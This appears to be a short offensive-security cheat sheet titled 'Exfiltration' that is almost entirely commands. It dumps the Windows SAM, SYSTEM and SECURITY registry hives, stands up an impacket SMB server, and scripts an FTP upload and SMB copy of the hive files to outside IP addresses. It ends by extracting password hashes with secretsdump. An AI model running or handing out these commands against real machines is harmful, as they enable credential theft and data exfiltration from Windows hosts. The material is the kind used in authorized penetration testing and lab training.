Exfiltration

Dump the SAM hive to the pwd

reg.exe save HKLM\SAM sam.bak

Dump the System hive to the pwd

reg.exe save HKLM\SYSTEM system.bak

Dump the Security hive to the pwd

reg.exe save HKLM\SECURITY security.bak

Spin up an smb server

impacket-smbserver share share/ -smb2support -username user -password password1
echo open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\Users\Administrator\Desktop\sam.bak >> ftp.txt && echo put C:\Users\Administrator\Desktop\system.bak >> ftp.txt && echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

Exfiltrate data

net use \\10.50.102.164\share /USER:adot8\user password1
move sam.bak \\10.50.102.164\share\sam.bak
move system.bak \\10.50.102.164\share\system.bak

Dump hashes with secretsdump

secretsdump.py -sam sam.bak -system system.bak local

Last updated

Was this helpful?